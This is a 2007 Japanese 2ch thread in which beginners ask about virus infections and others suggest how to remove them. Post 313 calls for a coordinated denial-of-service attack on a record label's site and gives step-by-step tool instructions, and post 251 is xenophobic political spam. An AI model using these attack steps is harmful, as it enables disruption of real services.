2004 ◆NFQtmGW3bw :2007/07/22(日) 10:23:58 ID:???
>>197
fooさんの削除方法試してみてや。
ttp://forum.higaitaisaku.com/viewtopic.php?t=1307
201まちがって名前消しちゃいました。:2007/07/22(日) 14:38:13 ID:PUv3s8Aj
>>199 レスどうもです。
トロイの木馬は 消えました。
何度かマカフィーでスキャンしたけど出てきません。
初期データ保存をしておけば良かったと今になって後悔しています。
今の状態 (トロイの木馬を消去した後) を保存すべきか
初期設定を業者頼んでやり直すべきか悩んでいます。
どうしたら良いでしょうか?
202まちがって名前消しちゃいました。:2007/07/22(日) 14:54:31 ID:qeztFrHy
ウィルス見つかって、無視するか解決か除外のどれが一番いいの?
203中国:2007/07/22(日) 15:16:49 ID:???
久しぶりにJWord感染した。。。。。。

どうやって除去するんだっけ???


>>202
理想は、リカバリー。
204まちがって名前消しちゃいました。:2007/07/22(日) 15:22:51 ID:/FH5hXjB
先程、原田ウイルスOOとかいうのに感染しました
画像がでてすぐに電源落としたのですがいくつかの動画等がビットマップに書き換えられてしまいました。
他に被害はみられないのですが大丈夫でしょうか…
感染元とみられるファイルは削除したのですが何か対策とかあったら教えてください
205まちがって名前消しちゃいました。:2007/07/22(日) 15:47:02 ID:qeztFrHy
>>203

選択肢、無視と解決と除外しかないんですけど、リカバリーってどれっすか?
2064 ◆NFQtmGW3bw :2007/07/22(日) 16:59:35 ID:???
>>201
それは自分で決めたほうがいいと思います。すいませんね。
>>202
中国さんの言うとおりリカバリーするのが一番いいでしょうね。
>>203
Jwordってコンパネでアンインストールできなかったっけ?
あれ自分も感染?したけど勝手にインストールされるから嫌ですよねwww
>>204
P2Pはやめましょうね。
>>205
除外に近いんじゃないですか?多分。よくわからないですね。
207まちがって名前消しちゃいました。:2007/07/22(日) 17:05:00 ID:yjY76Rpu
IEを起動しても「ページを表示できません」ってなる上にオンラインゲームが
できなくなったんですけどウイルスにやられたんですかね?
スキャンして検出されたのは削除したんですけど直らないんです。
ちなみに今使ってるファイヤーフォックスは普通に使えるんですよ。
パソコン初心者なのでどうしたらいいのか分からずお手上げです。
208中国:2007/07/22(日) 17:14:18 ID:???
>>205
そんな分かりずらい選択肢を出すのは、一体どんなソフトなんだろう。。。

無視は、論外。
解決=駆除?
除外=削除?

検出されたのが、ウイルス本体のみなら、駆除は出来ないから、除外かな。
209中国:2007/07/22(日) 17:15:17 ID:???
>>207
串いじられたのかな?
それだけだと分からんから、4さんにバトンw
2104 ◆NFQtmGW3bw :2007/07/22(日) 17:18:51 ID:???
>>207
自分もそれだけじゃわからないおwww
もしかしたら結構重症かもなので、私のサイトの掲示板に書き込みお願いします。
211まちがって名前消しちゃいました。:2007/07/22(日) 17:50:43 ID:qeztFrHy
>>208

ノートンです。
212まちがって名前消しちゃいました。:2007/07/22(日) 18:13:58 ID:yjY76Rpu
>>209
初心者なので串はいじってません。
しかしウイルス対策ソフトなどを入れずにwinnyを使っていたので、
やはりそれが原因でしょうか?
しかしそのwinnyもなぜだか動かなくなってしまいました。
>>210
そのサイトはどこなのか教えていただけるとありがたいです。
213まちがって名前消しちゃいました。:2007/07/22(日) 20:22:10 ID:NQ8+7tZx
>>200さん、ありがとうございます、今からやってみます!
214まちがって名前消しちゃいました。:2007/07/22(日) 20:40:24 ID:A4s+KAj2
いきなり画面が青くなりそこに英語がたくさん出てきたのですがウイルスですか?
私はウイルスでなくてエラーだと思います。
215まちがって名前消しちゃいました。:2007/07/22(日) 20:53:56 ID:gyaTnEf5
うpってなに?
216まちがって名前消しちゃいました。:2007/07/22(日) 23:25:07 ID:y5Ugk/+Y
>>212
初心者なのにwinnyって…
危機管理能力が足りないなあ…
キンタマに感染して人生終らしてる人ってこういう人が多いんだろうな…
217まちがって名前消しちゃいました。:2007/07/22(日) 23:31:07 ID:y5Ugk/+Y
取りあえず初心者はP2Pに手を出すなよ〜
タダのモノには裏があると思ったほうがいい
nyで流れてる有料アプリとかには気づいてないだけで必ずといって良いほどウイルスが仕込まれてるぞ
山田や原田の亜種は数が多すぎて市販セキュリティソフトでも対応が追いついてないから
気づかずに個人情報垂れ流してる人多そうやね
218まちがって名前消しちゃいました。:2007/07/22(日) 23:36:37 ID:A4s+KAj2
P2Pって何?プレイヤー セカンド ポインターの略?
219まちがって名前消しちゃいました。:2007/07/23(月) 00:30:20 ID:pX57en/d
XPです。 外付けHDに保存していたフォルダのアイコンにカーソルを合わせると確かに40GB入ってることに数字上ではなってるんですが開くと元々あったファイルが表示されなく空なんです。スパイウェアやウィルスは全て駆除したのに症状は変わらないんです(>_<)
220まちがって名前消しちゃいました。:2007/07/23(月) 02:15:22 ID:NeqZLxkI
>>212
です。キンタマや山田を調べてみましたがイマイチよく分かりませんでした。
とりあえず、winnyとそれでダウンロードしたものは全部削除しといた方が良いですかね?
221まちがって名前消しちゃいました。:2007/07/23(月) 11:13:43 ID:???
一年前山田(キンタマ?)に感染しフォーマットのやり方わからなくて回線引っこ抜いて放置してたんですが、
今日ウイルススキャンしたら何故かウイルスが一つも出てきません。ウイルスって勝手に消えてくれるんですか?
もう繋いでも大丈夫でしょうか。
222中国:2007/07/23(月) 22:27:08 ID:???
>>221
検出できないだけかと
223まちがって名前消しちゃいました。:2007/07/24(火) 00:11:01 ID:???
なんかたまに血しぶきみたいなのが画面に
でてくるんですがこれってウイルスですか?
2244 ◆NFQtmGW3bw :2007/07/24(火) 08:08:12 ID:???
>>221
ウイルス対策ソフトの期限切れかと。
>>223
その画面のアップお願いします。
225まちがって名前消しちゃいました。:2007/07/24(火) 09:49:26 ID:???
フォーマットに必要なディスクみたいな奴なくしてしまったんですが、この場合は買うしかないですか?
XPのパソコンなんですが今はもうビスタしか売ってないんでしょうか。またその場合いくらかかりますか
226まちがって名前消しちゃいました。:2007/07/24(火) 19:43:21 ID:???
>>225
XPはまだ売ってますよ。
227223:2007/07/24(火) 19:43:47 ID:???
>>224
http://vista.o0o0.jp/img/vi8527354512.jpg
4さんアップしてみました
鑑定お願いします
228まちがって名前消しちゃいました。:2007/07/24(火) 21:55:34 ID:???
>>226
2万円もするんですね。諦めますありがとうございました
229まちがって名前消しちゃいました。:2007/07/25(水) 18:01:36 ID:jspOMOfV
いまパソコンしていたらMcAfeeからの知らせで
「ウイルスが検出されました。ウイルスを駆除できません」と出ているのですが
どうすればよいでしょうか?
パソコン初心者なのでぜんぜんわからなくて・・・
230まちがって名前消しちゃいました。:2007/07/25(水) 18:37:55 ID:???
>>229
1.CtrlとAltとDeleteキーを一緒に押す。
2.タスクマネージャーを起動して「プロセス」てのを押す。
3.McAfeeが教えてくれたファイル名をプロセスの一覧から探して、終了させる。
4.ファイル検索でMcAfeeが教えてくれたファイル名を探してファイルを削除する。
 まちがってもダブルクリックしないように。
231まちがって名前消しちゃいました。:2007/07/25(水) 18:47:25 ID:???
>>230
もう隔離するを選んだら感染したファイルが削除されたんですがそれじゃだめですか?
232まちがって名前消しちゃいました。:2007/07/25(水) 19:41:08 ID:???
>>231
OKだと思う。
233アクセス :2007/07/25(水) 20:33:19 ID:Z18T/yoi
ウィルスとかではないのですが書き込みをすると個人情報が
もれるとどこかで聞いたことがあるのですが本当なのでしょうか?
234まちがって名前消しちゃいました。:2007/07/25(水) 20:58:40 ID:???
再びすみません
キンタマがウイルススキャンで引っかからなくなってしまったんですが、どうやって処理したらいいですか?
オンラインスキャンするのにネットに繋いだら個人情報漏れちゃいますよね。
感染してから30分くらいでネット切ってそれ以来繋いでないから現時点では漏れてないと思うんですが
235まちがって名前消しちゃいました。:2007/07/25(水) 21:52:38 ID:???
>>233
技術的にはインターネットの通信経路を盗聴できるらしい。
だから通販などクレジットカードや住所etc.を入力させるような場合は暗号化された通信を普通は行う。
IEなんかだと初期状態で暗号化されたページとそうでないページを移動するときに確認メッセージがでる。

だから2chや掲示板で個人情報は書き込まないほうが吉。
236まちがって名前消しちゃいました。:2007/07/25(水) 22:52:42 ID:???
>>234
携帯からなのか?とりあえずどうにかここ見てくれ。
おいらにはよくわからん。
http://myui.s53.xrea.com/kin/
237まちがって名前消しちゃいました。:2007/07/26(木) 05:27:53 ID:???
友達のアドレスからzipファイルが送られてきて
それを見たらメッセが使えなくなったけど、そのファイルを削除したら普通に使えるように回復
しかしそれは本人は送ってなく、調べてみるとワームだったらしい

だけどその後一回シャットダウンしたら極端に重くなり、起動はするものの何も出来ない状況に陥ってる

こういう場合の対処方を教えてもらえないでしょうか
ウイルスバスターの類は入ってません
2384 ◆NFQtmGW3bw :2007/07/26(木) 08:04:38 ID:???
>>237
バスターは入れましょう。
まずタスクの画像とかアップできますか?
239アクセス :2007/07/26(木) 16:15:53 ID:hWo2LDRl
>>235
そうですか!ありがとうございます。
240まちがって名前消しちゃいました。:2007/07/26(木) 20:19:41 ID:u021R8TD
シマンテックのオンラインウイルススキャンをしたら次のような
ウイルスが検出されたんですがどうしたらいいんでしょうか。

D:\TEMP\optserve.exe は Adware.Optserve に感染しています。
C:\WINDOWS\system32\UpdateOptserve.exe は Adware.Optserve に感染しています。
C:\Program Files\tora3\2chtubo\log\wwwww.2ch.net\news4vip\1181707745.dat は VBS.Freelink.B に感染しています。
C:\Program Files\tora3\2chtubo\log\cocoa.2ch.net\famicom\1025169635.dat は VBS.LoveLetter.A に感染しています。
241まちがって名前消しちゃいました。:2007/07/26(木) 21:37:52 ID:???
>>240
直接削除してみなはれ。
削除できなかったら
>>230
を参考にMcAfeeを読み替えてトライ
242まちがって名前消しちゃいました。:2007/07/26(木) 23:11:33 ID:XykafD2N
質問です。
「くーる」と打ったら「アニキ」と変換されました。
これは何かウィルスに感染してるのでしょうか?
それとも普通のことなのでしょうか?
243まちがって名前消しちゃいました。:2007/07/26(木) 23:19:47 ID:u021R8TD
>>240
直接削除できました
244まちがって名前消しちゃいました。:2007/07/27(金) 00:53:46 ID:Gsthf4bw
一時間前に「高危険(←はっき覚えてないのですが)ウイルスに感染しました」と表示されたのですがまったくの初心者でどうしていいかわからず業者に頼むのが良いと思いそのままの画面で放置してあるのですが大丈夫でしょうか?
それとも一回シャットダウンしたほうが良かったのでしょうか…


ちなみに警告が表示される前に今まで観ていたサイトがフラッシュバックみたい?になってそのあと警告がでました。些細な情報でもいいのでお願いします!
245まちがって名前消しちゃいました。:2007/07/27(金) 01:24:49 ID:m1mE4Kec
>>244
回線は切ってあるんだよね 対策ソフトは何入れてるの?
スキャンして駆除や隔離できれば問題ないと思うけど…
フラッシュバック? なんてウィルスだろ
246まちがって名前消しちゃいました。:2007/07/27(金) 02:34:03 ID:3ve/WNZb
先ほどピーチチューブなるものに登録されました
知人の話では詐欺であるとのことでしたが、本当に大丈夫なのでしょうか
もしよければ教えてください
とても不安です
247まちがって名前消しちゃいました。:2007/07/27(金) 03:13:16 ID:???
>>246
ただのワンクリならシカト
一応ウィルススキャンして 何かもらってないか確認
248まちがって名前消しちゃいました。:2007/07/27(金) 03:50:45 ID:P9wALGCi
1111.845845.cn/xi.htm
249まちがって名前消しちゃいました。:2007/07/27(金) 04:05:12 ID:3ve/WNZb
>>247どうもワンクリのようです。とりあえず無視しときます
これからウイルスをチェックしてみます
250まちがって名前消しちゃいました。:2007/07/27(金) 11:02:16 ID:???
パソ買って間もない私ですが、MSNホットメールの受信メール開いたら
ワームが出てきたんですが・・(手紙を開くことすらできません)
これってどうやったら消せるんでしょうか??
avastで念のためC:ローカルを検査してるんですけど
251まちがって名前消しちゃいました。:2007/07/27(金) 17:41:40 ID:5H3ywFjC
選挙に行っても何も変わらないし…と思っているアナタ!
一度でいいからこれを見てください。

NHK新風政見放送

その1
http://jp.youtube.com/watch?v=nv6OtRDVJSA
その2
http://jp.youtube.com/watch?v=FrrtmowoWwo

ちなみに、基本主張は
■サラ金・パチンコの壊滅
 →グレーゾーン撤廃・パチンコに高率の間接税をかけて国営カジノを創設
■教育の正常化
 →日教組の解体/道徳教育の復活
■安心・安全な社会
 →不法滞在外国人の強制送還/入管法の強化/雇用者罰則強化
■在日特権の廃止
 →特別永住資格付与制度の見直し
■「政教一致」問題
 →公明党の政界からの追放!
■国家反逆罪の制定
 →極左・総連・カルト宗教の解散
■偏向マスメディア
 →マスコミ監視制度の創設/特権の廃止


252まちがって名前消しちゃいました。:2007/07/27(金) 21:17:46 ID:JKgPvWxj
PHP_SHELL.Gってウイルスがインターネット一時ファイルから見つかったんですが
対応はインターネット一時ファイルの削除だけでいいのでしょうか。
253まちがって名前消しちゃいました。:2007/07/27(金) 22:26:03 ID:u7oQkl2s
ウイルスバスターでウイルス検索中なんですけど検出数のとこに26って出てるんですけど、それってウイルスがあるってことですよね?
254まちがって名前消しちゃいました。:2007/07/27(金) 22:33:23 ID:JKgPvWxj
終わるまで待て
クッキーの可能系もある
255まちがって名前消しちゃいました。:2007/07/27(金) 22:44:17 ID:u7oQkl2s
>>254
スパイウェア クッキーがでてきました。どうすればいいでしょうか?
256まちがって名前消しちゃいました。:2007/07/27(金) 22:57:44 ID:7HaOxBl8
>>255
くっきーは2chのじゃないかな?
ちょっと出て来たの書いて味噌。
257まちがって名前消しちゃいました。:2007/07/27(金) 23:01:12 ID:JKgPvWxj
クッキーはスパイウエアじゃないよ
削除したかったらすればいいししたくなかったらしなくてもいいと思う
詳しくはググレカレー

削除する場合はインターネットブラウザのツールからオプションに進んで
クッキーの削除ってとこをクリックすればおk
258まちがって名前消しちゃいました。:2007/07/27(金) 23:05:27 ID:N5PDZIhD
>>252
インターネット一時ファイルを削除してもう一度スキャンしてみなされ
たぶんOK

>>255
スパイウェア クッキーって多分「トラッキングクッキー」の事だと思うけど そうなら放っておいてもOKなんじゃないかな
でも バスター使ったならスキャン後にスパイ、ウィルス、Sホールの検索結果が出たよね?
スパイを表示して全て削除をすれば 全部消えると思いますよ
あるいはCookieとTemporary Internet Filesを全削除で
259まちがって名前消しちゃいました。:2007/07/27(金) 23:53:56 ID:???
TyoianHouseというウイルスに感染して、どうせ検疫削除で済むだろうと思いましたが無理みたいです。ネットにも繋げる事ができません。ウイルスソフトはシマノテックです。どうすればよろしいですか?申し訳ありません…
260まちがって名前消しちゃいました。:2007/07/28(土) 00:08:56 ID:lbd2Vuie
シマノテックってノートンって事ですよね?
削除というか隔離できないんですか?
最悪 リカバリで
261まちがって名前消しちゃいました。:2007/07/28(土) 01:29:40 ID:GLpFte+g
2chブラで画像を見ても
そこにアクセスしなきゃ大丈夫ですよね?
まだ怖くてつかってないんです
262まちがって名前消しちゃいました。:2007/07/28(土) 01:37:32 ID:???
すいません使いますた。
263まちがって名前消しちゃいました。:2007/07/28(土) 08:12:50 ID:3dLBP5Ha
ウイルスに感染して隔離できなくて手動で処理して下さいってあったんでポップアップに表示されたウイルスのファイル名を検索して削除して消えたと思ったらまた戻ってくるんですが…
どうなっているのでしょうか?
ちなみにパソコンが今糞重いからセーフモードにしてやりました
264261:2007/07/28(土) 12:32:28 ID:???
きのう間違ってピンク版の画像のとこにアクセスしますた。
ファイアーフォックスが重いおかげですぐけしたのですが
今こんなのがAvira Antivir から出てきました(バスターも入ってるがスルーされた模様)
contains signature of the HTML script virus :HTML/EXPloit.Mhtml 
↑隔離してくれましたので大丈夫ですよね?
265261:2007/07/28(土) 12:48:48 ID:???
詳細
C:\hiberfil.sys
[WARNING] The file could not be opened! ←気になる
C:\pagefile.sys
[WARNING] The file could not be opened!
C:\Users\****\AppData\Local\VirtualStore\Program Files\Live2ch\log\love6.2ch.net\aasaloon\1165570289.dat  ←元凶
[DETECTION] Contains signature of the HTML script virus HTML/Exploit.Mhtml
[INFO] The file was moved to '46e0b750.qua'!
266まちがって名前消しちゃいました。:2007/07/28(土) 13:03:46 ID:???
>>261
課スペルから抜粋。。。。。
Exploit.HTML.Mht
警告レベル: 緑(低)
別名
Exploit.HTML.Mht (Kaspersky Lab) は以下の名称でも知られています:
Exploit-MhtRedir.gen (McAfee), Exploit:HTML/MhtRedir.gen* (RAV), HTML/Exploit.Mhtml (H+BEDV), Exploit.HTML.MHTRedir.1n (ClamAV), Exploit/Mhtredir.gen (Panda)
登録日 2004年7月6日                                         ↑お前のじゃ!!
動作分類 ハックツール(Exploit)
技術情報
このファィルは、Internet Explorer のセキュリティの脆弱性を使って、悪意があるプログラムをPCにダウンロードしてインストールするように試みるインストラクションを含んでいます。
隔離したからどうなんだろう・・・平気じゃにかな?
267まちがって名前消しちゃいました。:2007/07/28(土) 13:05:25 ID:XbAGi73I
あげ
268名無しさん@そうだ選挙に行こう:2007/07/29(日) 01:22:20 ID:lfv2PBrB
ウイルスにやられて何も出来ない状態になったのでHD変えました。XPからMEにしたのでウイルスは入ってないですよね?今のところは何も起きません。
269名無しさん@そうだ選挙に行こう:2007/07/29(日) 02:01:43 ID:H39xifJR
>>268
最弱OS Meにしたんかw 頑張れ 
270名無しさん@そうだ選挙に行こう:2007/07/29(日) 03:41:48 ID:0WyUxdp9
初めて書き込みます、不手際な所がありましたらお許し下さい。
先日、MSNメッセンジャーを起動していたところ、友人から無言でURLを貼り付けたメッセがきました。
この友人からはよく無言でURLだけを貼り付けてくるので、何の違和感ももたずにクリックしてしまいました。
そうしたら、どうやらウイルスをDLするURLらしく、アンチウイルスソフトから警告がでました。
いつもどおり削除して安心していたところ、1時間後くらいにまた同じ警告が…。
その後、PCを起動するたびに同じウイルスが復活し、削除しても1時間後くらいに同じ警告がでて大変困ってます。

当方アンチウイルスソフトは「avast!」を使っており、その際にでた警告なのですが、

場所:C:\WINDOWS\system32\atraslay.dll
ウイルス名:Win32:Warezov-CLA [Wrm]

場所:C:\WINDOWS\system32\icwpslbi.exe
ウイルス名:Win32:Warezov-BXK [Wrm]

場所:C:\WINDOWS\system32\iissmspb.dll
ウイルス名:Win32:Warezov-BUA [Wrm]

となっていました。
PCに詳しい友人に聞いて、色々対処法を試したのですが、駆除できずじまいでお手上げ状態です。
どなたかこのウイルスの駆除方法をご存知の方はご教授願います。
271名無しさん@そうだ選挙に行こう:2007/07/29(日) 04:14:24 ID:s7qPTcml
質問です。
自分はドがつくPC初心者なんですが、
今日、自分のPCを家のLANケーブルをつかって
インターネットに接続し
1〜2分ヤ○ーをひらいたのですが
急にウィルスが怖くなって
すぐシャットダウンしケーブルを外しました。
数時間後、家族用でネットにつないであるPCで
ネットから画像などをとって
USBメモリーを利用して
自分のPCにうつしたら
マカーフィーがトロイの木馬をみつけました。
どうすればいいのかわからなかったので
ファイルを削除するを選びました。
トロイはいつ入ってきたのでしょうか?
PCは大丈夫なのでしょうか?
一応スキャンしたところなにもみつかりませんでした。
272名無しさん@そうだ選挙に行こう:2007/07/29(日) 04:34:38 ID:FIOqltTb
www2.stran
これ危険なんですか?
273名無しさん@そうだ選挙に行こう:2007/07/29(日) 08:38:34 ID:lfv2PBrB
>>269 昔使ってたノートパソコンのHDをつかってる。なるべくHD買って2000にしたいのだが中学生だから金がないorz
274270:2007/07/29(日) 16:41:07 ID:0WyUxdp9
急ぎの質問でしたので、他の掲示板で質問させていただく事にしました。
これにて>>270の質問は締め切りたいと思います。
お騒がせいたしました。
275;;:2007/07/30(月) 22:20:08 ID:Au1DNZv1
最近ダンロード等してないはずがCドライブの空き容量が増えていっているようなのですがウイルス等関係あるのでしょうか?対処等情報お願いします・・・
276まちがって名前消しちゃいました。:2007/07/30(月) 22:29:12 ID:a0nTUxQI
すいません。PC初心者、昨日からノートパソコンを動かしはじめたのですが、、
先ほどやっとの思いでライブ2ちゃんができるようになりまして、レスを表示したら画面全体が急に薄く真っ白になり、動かせなくなりました。
強制終了をして、立ち上げたらインターネット接続がめちゃくちゃ重くなりました。。
しまいには今、ライブ2ちゃんだけは立ち上がるけどインターネットエクスプロ−ラをダブルクリックしようが一瞬反応して、ヤフーすらでなくなりました・・・

これはウィルスでしょうか??
なにか、いい手立てがあれば教えていただけるとすごく嬉しいのですが・・・  

277まちがって名前消しちゃいました。:2007/07/31(火) 00:45:05 ID:???
>>275-276
ウィルス対策ソフトは入れてるんだよね? スキャンしたんだよね?
278まちがって名前消しちゃいました。:2007/07/31(火) 00:56:01 ID:BPOTlw98
お騒がせしました。
sキャンして変なプログラム?をけしたらなんとかいけました
279まちがって名前消しちゃいました。:2007/07/31(火) 02:19:56 ID:peHrR17C
質問です。
2時間くらい前にPCを起動したのですが、起動してからずっと
CPU使用率が100%なんです。
リソースモニタを開いてみたらdllhost.exeというのが平均60%の
CPU使用率になっているんです。
これってウイルスですか?(わかりずらい文章ですみません・・・orz)
280まちがって名前消しちゃいました。:2007/07/31(火) 03:55:06 ID:???
>>279
まず「dllhost.exe」でググってみようよ
エラー ウィルス 検索するクセつけとけば 大抵自己解決できる

http://oshiete1.goo.ne.jp/qa2978408.html
2814 ◆NFQtmGW3bw :2007/07/31(火) 10:56:57 ID:???
>>275
システムの復元を無効にし、すぐに有効に戻してみてください。

>>279
280さんのいうとおりです。
少しでもいいから調べる癖をつけておくといいですよ。
282;;:2007/07/31(火) 12:53:12 ID:78dV9rLi
>>281ありがとうございます それで3Gは削れることができました。

しかし後24Gもあるんですが・・・ほとんどダウンロード等行わないのに溜まっているんですが・・・・なにか対処等他にないでしょうか
283279:2007/07/31(火) 14:11:28 ID:peHrR17C
>>280 >>281
すみません。ありがとうございます。
dllhost.exeのプロセスを終了させて再起動させたら
直ったようです。そのあとウイルス検索もしましたが、
なんにもでてきませんでした。
284まちがって名前消しちゃいました。:2007/07/31(火) 14:53:31 ID:+jonqNsQ
パソコンを立ち上げると何度もクラッシュしてその後英語で何か書かれたが出て来る
285まちがって名前消しちゃいました。:2007/07/31(火) 16:12:14 ID:+iHGafCJ
bug.exeが起動時に毎回出る。ググってもわからない。HELP
2864 ◆NFQtmGW3bw :2007/07/31(火) 17:21:50 ID:???
>>282
キャッシュとか消してみてください。
>>284
その英語を全文ここに書いてください。
>>285
P2Pとかやってませんか?
287まちがって名前消しちゃいました。:2007/07/31(火) 18:03:10 ID:+iHGafCJ
>>285そうです。ウイルスバスター2007では無理でした。
288まちがって名前消しちゃいました。:2007/07/31(火) 18:04:08 ID:+iHGafCJ
>>285訂正後→>>286
2894 ◆NFQtmGW3bw :2007/07/31(火) 18:58:25 ID:???
>>288
P2Pウイルスは新種や悪質な物が多いのでP2Pはやめましょう。
ちょっと待っててください。
調べてみます。
290まちがって名前消しちゃいました。:2007/07/31(火) 19:16:58 ID:+iHGafCJ
>>289之に懲りてやめようと思います。お願いします。
291;;:2007/07/31(火) 19:45:51 ID:78dV9rLi
>>286 無知ですいません。どうやって消せば;;
292277で280:2007/08/01(水) 03:01:52 ID:???
>>290
nyやP2P使ってると バスターやノートンでもスルーされる悪質なプログラム拾うんだよね
bug.exe自体とレジストリやスタートアップフォルダからbug.exeを呼び出しているプログラムを削除すればよい…のかな?
ん〜 リカバリしちゃった方が早そう… 「4 ◆NFQtmGW3bw」さんなら詳しい対処法 わかるかな? 
P2Pやny使う時はさ 他の事に使わないそれ専用PCで いつでもリカバリするくらいのつもりじゃないと…

>>291
「Cドライブの空き容量が増えていっているようなのですが」って事だけど 「空き」は減ってるんだよね
一時ファイル消すより 症状から考えられる一番の要因ってウィルスっぽいんだけど…
>277で書いた疑問がスルーされたんだけど スキャンはしたんだよね?
それと 当たり前だけど 使わないプログラムは削除した?
2934 ◆NFQtmGW3bw :2007/08/01(水) 13:15:05 ID:???
>>290
まずセーフモードでにして起動してください。
起動できたら「スタートメニュー」→「すべてのプログラム」→「スタートアップ」
でbug.exeを起動しようとしていないか調べてください。

>>292
P2Pやってる人は知らず知らずのうちに感染してることもありますからね。
ちなみに自分もbug.exeはよくわかりません。できることはやってみるだけです。
294まちがって名前消しちゃいました。:2007/08/01(水) 13:50:21 ID:l6O8yhUn
>>293bug,exeの実行ファイルを消したら毎回起動時にbug.exeが見あたりません。と、くるようになった。
また、system32 cmd とかいうのも毎回動作するんです。これは消してもまたすぐ復活するんです。どこかに
親が居るんでしょうか?毎度、お願いします。
295まちがって名前消しちゃいました。:2007/08/01(水) 16:49:56 ID:???
職場のPCの動作がおかしくなりました。
症状としてたCPU使用率が100%になったり、デスクトップ上のショートカットアイコンがチラチラ点滅(?)したり、ネットやるといったん表示した画面を何回も再読み込みしたりします。
ウイルスバスターのコーポレートエディション及びスパイボットでチェックしましたが何も出てきません。
わかる方がいたら、対処のやり方教えてください。
296292:2007/08/01(水) 23:29:56 ID:???
>>294
http://windows.dot.thebbs.jp/1028536195.601-700
↑の[636]に似た症状のレスがあります 以降に対処方のレスも幾つかありますので試してみては?

>>295
「CPU使用率が100%」でググると幾つもHITします
いろいろ読んでみて これかなという対処方を試してみては?(XPの修正パッチが多いようですが)
「ショートカットアイコンがチラチラ点滅」「画面を何回も再読み込み」は 処理が遅くなっている事が原因かと
297まちがって名前消しちゃいました。:2007/08/02(木) 04:29:44 ID:???
インストール中にウイルスバスターから警告表示出たので
すぐにインストール止めたんですが
検索したところスパイウェア1つだけ発見されました。

しかしPCを立ち上げると
勝手に次々サイトが出て来てきます。
これはウイルスではないのですか?

あと対処法を教えて下さい。
298まちがって名前消しちゃいました。:2007/08/02(木) 13:20:09 ID:???
一昨日から キタコレ Win32.OnlineGames
手持ちの駆除ソフトで駆除できない
打ち込んだキーを盗んでいるような感覚あり
299296:2007/08/03(金) 01:09:19 ID:???
>>297
OS XPでしょうか? 
「スタートメニュー」→「すべてのプログラム」→「スタートアップ」の中を整理削除してみてください
スパイウェアの方は種類がわからないと ただのトラッキングクッキーって事も

>>298
トロイWin32.OnlineGamesに対応した対策ソフトを購入しなされ
Win32.OnlineGamesでググって探せば 検出・駆除できるソフトもわかるかと
300まちがって名前消しちゃいました。:2007/08/03(金) 01:29:11 ID:???
>>299
ありがとうございます(^ω^)
301ウィルス:2007/08/03(金) 09:19:25 ID:kZH5VMGG
あの詳しい方にお聞きしたいのですが…
自分はノートンに入ってるのですが朝起きてパソコンをつけると
ノートンが赤くなっていてリスクありと出ていたのですが
再起動すると緑色で安全となったのですがウィルスか何かなんでしょうか?
PCはあまり詳しくないのでわかる方お願いします。
302まちがって名前消しちゃいました。:2007/08/03(金) 16:22:50 ID:???
303まちがって名前消しちゃいました。:2007/08/03(金) 16:48:45 ID:???
>>298
打ち込んだキーを盗んでるような感覚ってどんな感じ?
304中国:2007/08/03(金) 20:19:20 ID:???
パケットアナライザでも使ってるのでは?
305まちがって名前消しちゃいました。:2007/08/03(金) 20:28:49 ID:wLFe6SQi
ヤフーとかグーグルで検索するとたいてい英語系のエロサイトにつながっちゃう。なぜ?
306まちがって名前消しちゃいました。:2007/08/03(金) 22:22:07 ID:NnDQXgRN
307( =@ω@=) ◆NIral10/7M :2007/08/04(土) 00:58:53 ID:???
>>305
その説明だと状況がよくわからないのですが 悪質なアドウェアにやられたのかな?

↓アドウェアのWIKIです 「リンク乗っ取り型」にやられた?
http://ja.wikipedia.org/wiki/%E3%82%A2%E3%83%89%E3%82%A6%E3%82%A7%E3%82%A2

ウイルス対策ソフトで駆除できたと思うんですが どうですか?
308( =@ω@=) ◆NIral10/7M :2007/08/04(土) 01:00:31 ID:???
あ コテのままだった 299でした
って ま いいか
309まちがって名前消しちゃいました。:2007/08/04(土) 01:11:06 ID:ZsrcUOCw
なんかいきなりデスクトップなどの
文字がちいさくなってみえなくなったんですが;
どうすればいいですか??
310( =@ω@=) ◆NIral10/7M :2007/08/04(土) 02:06:21 ID:???
>>309
「フォントサイズ変更」でググってみなされ
いきなりって何? なんで? そんな悪戯ウィルスなんてあるの? リモートされてる?
311まちがって名前消しちゃいました。:2007/08/04(土) 10:40:20 ID:EiVLd57e
連打ソフトの「即打くん」を起動させたら
Trojan.Win32.Agent.yx
って言うのをウイルスセキュリティで検出しました。
2日ほど前からクリックがダブルクリックになったりするような
誤作動が出ていたのですが関係あるのでしょうか?
前から使っていたのでなぜ今になって?と言う思いはあります。
312あぼーん:あぼーん
あぼーん
313全2ch住民に協力要請:2007/08/04(土) 19:45:37 ID:DcPr9RGc
●ゲイツ砲射撃方法
 1.ゲイツをDL、.特製日本語化パッチをDLする。(http://juhuifjnm.hp.infoseek.co.jp/gates/
 2.ゲイツをインストール。Yes→Next→しばしお待ちを→OK→Finish
 3.日本語化パッチを使用する前に、日本語パッチファイル内の「サービス停止.cmd」を起動
 4.日本語化パッチを使い、wastjp.exeを起動
 5.ゲイツ砲弾をDL、解凍。http://shota.aikotoba.jp/www.avexnet.or.jp.new.mdb(砲弾配布までDL不可)
 6.ゲイツ起動。(ディスク(C)>Program File>Microsoft Web Application Stress Tool>hclient.exeから)
 7.砲弾を装填。(日:ファイル→開く→さっき解凍した砲弾を選択し開く)
 8.攻撃時刻と共に発射。(左上にある|>(Run Script)をクリック→キタ━(゚∀゚)━━ ッ!!!!!!)
 9.終了する。(日:テストの停止)
※ゲイツの威力アップ方法
 右のプルダウンからSettingを選択→ストレスレベルとストレス乗数を適度にあげる(ADSLで10*3ぐらい光なら20*5ぐらい)
 ゲイツは非常に強力。こちらを最優先に使用しろ。

作戦行動中に変更はありえない。語情報に注意し、攻撃部隊以外はVIPでの宣伝活動及びレーション(エロ画像)を用意し士気を上げるのだ。
更に詳しいことは、避難所(http://ex14.vip2ch.com/test/read.cgi/part4vip/1186146999/l50)を確認しろ。
314( =@ω@=) ◆NIral10/7M :2007/08/05(日) 00:11:42 ID:???
>>311
誤作動はウィルスのせいみたいですね yxって「Trojan.Win32.Agent」の亜種でしょうし
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=124450
連打ソフトはウィルスとは関係なく 最近どこかでウィルスに感染した為に 今になって誤作動し始めたのでは?
315かん:2007/08/06(月) 11:26:56 ID:G0hT4x1w
HP開いてFDがガチャガチャなる
メール作成画面が大量に出る
ブラウザーが大量に出るのは(無限)
はたぶんブラクラだろう(たまに反応するときも)
316まちがって名前消しちゃいました。:2007/08/07(火) 19:11:23 ID:qarSkRmj
